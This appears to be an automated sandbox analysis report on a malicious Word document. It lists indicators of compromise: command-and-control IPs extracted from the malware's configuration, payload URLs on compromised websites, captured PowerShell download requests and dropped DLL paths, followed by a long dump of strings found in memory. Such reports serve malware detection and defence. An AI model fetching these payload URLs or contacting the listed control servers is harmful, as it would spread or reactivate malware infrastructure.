207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
45.79.33.48	unknown	United States	63949	LINODE-APLinodeLLCUS	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
50.62.141.15	alfaofarms.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
72.167.40.83	thepilatesstudionj.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
51.178.61.60	unknown	France	16276	OVHFR	true
177.72.80.14	unknown	Brazil	262543	NewLifeFibraBR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.210.242.234	unknown	France	16276	OVHFR	true

Private

IP
192.168.2.1
127.0.0.1

Contacted Domains

Name	IP	Active
thepilatesstudionj.com	72.167.40.83	true
alfaofarms.com	50.62.141.15	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/	true	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus detection for URL or domain

Source: https://staviancjs.com/wp-forum/QOm4n2/	Avira URL Cloud: Label: malware
Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split	Avira URL Cloud: Label: malware
Source: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 21.2.rundll32.exe.30146b8.1.raw.unpack

Multi AV Scanner detection for submitted file

Source: 1711.doc	Virustotal: Detection: 39%	Perma Link
Source: 1711.doc	Metadefender: Detection: 20%	Perma Link
Source: 1711.doc	ReversingLabs: Detection: 57%

Multi AV Scanner detection for domain / URL

Source: alfaofarms.com

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\13791789.dll	Metadefender: Detection: 34%	Perma Link
Source: C:\ProgramData\13791789.dll	ReversingLabs: Detection: 81%
Source: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)	Metadefender: Detection: 34%	Perma Link
Source: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)	ReversingLabs: Detection: 81%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49794 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615CD1EE FindFirstFileExA,

14_2_615CD1EE

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\cmd.exe

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.5:49752 -> 72.167.40.83:80

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: thepilatesstudionj.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.5:49794 -> 51.178.61.60:443

Source: winword.exe

Memory has grown: Private usage: 0MB later: 76MB

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.79.33.48 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 168.197.250.14 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.178.61.60 187	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 51.178.61.60:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 45.79.33.48:8080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 177.72.80.14:7080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

HTTP GET or POST without a user agent

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: thepilatesstudionj.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: alfaofarms.comConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: EcobandGH EcobandGH

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 196.44.98.190 196.44.98.190

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49796 -> 45.79.33.48:8080

Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/
Source: powershell.exe, 00000005.00000002.339928145.0000000004958000.00000004.00000001.sdmp	String found in binary or memory: http://alfaofarms.com4
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000003.511663984.0000000003096000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.309254161.0000000007861000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000005.00000003.306337007.0000000007819000.00000004.00000001.sdmp	String found in binary or memory: http://crl.verisign.
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/9aTcv/.Split.Split
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/In
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/Tcv/.Splitplit0.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngp
Source: powershell.exe, 00000005.00000002.339588827.0000000004711000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.co
Source: powershell.exe, 00000005.00000002.343390690.0000000004D5D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com
Source: powershell.exe, 00000005.00000002.343856415.0000000004E23000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com/wp-conte
Source: powershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5
Source: powershell.exe, 00000005.00000002.343390690.0000000004D5D000.00000004.00000001.sdmp	String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5U
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlp
Source: svchost.exe, 00000008.00000002.309740186.000001C419413000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: powershell.exe, 00000005.00000003.337043153.00000000078AD000.00000004.00000001.sdmp	String found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCK
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14/563209-4053062332-1002
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14/W
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14/h
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://168.197.250.1480/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://168.197.250.14:80/
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL2q
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL4053062332-1002
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHLz
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14:80/y
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://45.79.33.48/a
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48/s
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/0
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/2
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://45.79.33.48:8080/a
Source: rundll32.exe, 00000015.00000002.535047185.0000000002FF0000.00000004.00000020.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVo
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVoU
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVoryptography
Source: rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmp	String found in binary or memory: https://45.79.33.48:8080/uDpHLeAeeItaVou/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/
Source: rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/E
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTN
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTN3
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTNa
Source: rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/xlgRAUoKyrAaNnNNtTNh
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.office.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://augloop.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.entity.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: svchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cortana.ai
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://cr.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://directory.services.
Source: svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000002.309921606.000001C419462000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
